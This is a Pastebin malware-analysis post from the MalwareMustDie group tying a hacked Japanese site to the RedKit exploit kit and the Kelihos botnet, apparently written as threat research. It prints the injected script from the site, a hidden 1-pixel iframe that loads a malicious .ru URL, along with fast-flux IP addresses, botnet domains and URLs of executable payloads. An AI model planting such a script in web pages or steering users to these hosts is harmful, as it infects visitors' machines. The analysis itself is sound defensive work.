Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // #MalwareMustDie!
- // Relation between Hacked Sites, RedKit EK and -
- // Kelihos infection - a PoC
- // Infector : a hacked site:
- h00p://midinette.co.jp/
- // Injected script with long white space trails..:
- </table><!--6b1ee4-->
- <script type="text/javascript" language="javascript" >
- (function () { var tu = document.createElement('iframe');
- tu.src = 'h00p://vezylgys.ru/count10.php'; <========================
- tu.style.position = 'absolute';
- tu.style.border = '0';
- tu.style.height = '1px';
- tu.style.width = '1px';
- tu.style.left = '1px';
- tu.style.top = '1px';
- if (!document.getElementById('tu')) {
- document.write('<div id=\'tu\'></div>');
- document.getElementById('tu').appendChild(tu); }})();
- </script><!--/6b1ee4-->
- // The domains is the KELIHOS payload domains:
- "vezylgys.ru"
- // Trailing infector URL:
- --2013-11-05 15:22:25-- h00p://vezylgys.ru/count10.php
- Resolving vezylgys.ru (vezylgys.ru)...
- failed: hostname nor servname provided, or not known.
- unable to resolve host address 'vezylgys.ru'
- // IP Addresses used were fast flux:
- 2012-12-01 106.1.203.42
- 2013-04-17 109.251.176.16
- 2013-04-22 178.151.148.83
- 2012-12-01 178.158.182.164
- 2012-12-01 37.229.37.16
- 2012-12-01 46.118.41.236
- 2012-12-01 46.119.245.121
- 2012-12-01 93.79.247.98
- // If we picked one of the address.. the rest of Kelihos domains will apears..
- 178.151.148.83 IP address information
- 2013-05-18 cylylwib.ru
- 2013-04-29 hg9lditg.ojmeqkuq.ru
- 2013-08-11 nyzveuc.com
- 2013-06-28 peabtaka.ru
- 2013-07-16 tofhermi.ru
- 2013-06-28 utykixep.ru
- 2013-04-22 vezylgys.ru
- // Let's check the payloads records on that IP:
- 2/39 2013-08-14 11:07:55 h00p://178.151.148.83/rasta02.exe
- 1/39 2013-07-21 17:16:16 h00p://178.151.148.83/file.htm
- 4/39 2013-07-16 15:53:11 h00p://tofhermi.ru/rasta01.exe
- 1/38 2013-07-14 11:44:41 h00p://178.151.148.83/index.htm
- 1/39 2013-07-14 11:44:41 h00p://178.151.148.83/main.htm
- 1/38 2013-07-12 08:12:36 h00p://178.151.148.83/login.htm
- 5/39 2013-06-28 09:19:56 h00p://utykixep.ru/goodtr1.exe
- 4/39 2013-06-28 09:20:02 h00p://peabtaka.ru/b0ber01.exe
- 2/39 2013-05-17 18:19:56 h00p://178.151.148.83/welcome.htm
- 1/39 2013-05-13 19:12:45 h00p://178.151.148.83/setup.htm
- 3/35 2013-04-29 04:38:11 h00p://hg9lditg.ojmeqkuq.ru/calc.exe
- 5/36 2013-04-22 16:14:05 h00p://vezylgys.ru/
- //Well, all of the data above are either Kelihos or RedKit EK URL.
- // Now we have PoC relation between :
- This infected site, count**.php redirection, to the same infrastructure as the Kelihos botnet.
- Kelihos spread themself into the hacked sites that they injected with the infector script,
- which likely to be forwarded to exploitation to infect the payload.
- ---
- #MalwareMustDie!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement